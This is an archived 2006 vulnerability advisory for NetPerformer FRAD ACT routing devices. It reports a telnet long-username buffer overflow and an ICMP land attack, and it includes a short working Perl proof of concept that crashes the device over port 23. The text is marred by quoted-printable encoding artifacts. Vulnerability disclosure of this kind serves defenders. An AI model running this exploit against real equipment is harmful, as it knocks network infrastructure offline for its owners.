TUCoPS :: HP Unsorted N :: b06-4689.htm

NetPerformer FRAD ACT Multiple Vulnerabilities
NetPerformer FRAD ACT Multiple Vulnerabilities
NetPerformer FRAD ACT Multiple Vulnerabilities





NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =2E<=[ Arif Jatmoko ]=>=2E

Release Date : 8 July 2006

Product Affected :

=A0 =A0- NetPerformer FRAD ACT SDM-95xx version 7=2Exx (R1), earlier, and
possibly newer
=A0 =A0- NetPerformer FRAD ACT SDM-93xx version 10=2Ex=2Ex (R2), earlier, and
possibly newer
=A0 =A0- NetPerformer FRAD ACT SDM-92xx version 9=2Ex=2Ex (R1), earlier, and
possibly =A0newer
=A0 =A0- =2E=2E=2E=2E


Web Site :
=A0 =A0www=2Enetperformer=2Ecom


==2E[DESCRIPTION]=2E
NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc=2E This device mainly
used for connecting distributed WAN network through frame relay or ATM
network=2E



==2E[DETAILS]=2E
1=2E Telnet long username Buffer Overflow=2E
Passing an overly long username (>4550 char) against telnet service causes
device to reboot=2E Successful remote exploitation will possibly allows an
attacker gaining access into the device=2E


=================================00=2E^=2E00=================================# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto =A0 =A0=> "TCP"))
{
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "Modhiar'000 =2E=2E=2E=2E=2E killing netperformer =2E=2E=2E $ARGV[0]
port 23=2E=2E=2E";
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0sleep(1);
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print $socket "LOGIN " =2E "A" x 4550 =2E "BCDE\r\n";
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0sleep(1);
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print $socket "PASS " =2E "\r\n";
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0close($socket);
}
else
{
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

=================================00=2E^=2E00=================================
2=2E ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be hang
up and resetting current TCP handshake connection=2E In earlier version
possibly will make device to reboot=2E


WORKAROUND

No Workaround yet for this vulnerability=2E

Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities=2E



Arif Jatmoko //==2E
Information System Security Officer
Coca-Cola Bottling Indonesia


_______________________________________________________________________________
Visit us at www.coca-colabottling.co.id 

CAUTION: 
This message may contain privileged and confidential information intended only for the use of the addressee named above. If you are not the intended recipient of this message, you are hereby notified that any use, dissemination,distribution, or reproduction of this message is prohibited. If you have received this message in error, please notify Coca-Cola Bottling Indonesia immediately. Any views expressed in this message are those of the individual sender and may not necessarily reflect the views of Coca-Cola Bottling Indonesia.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH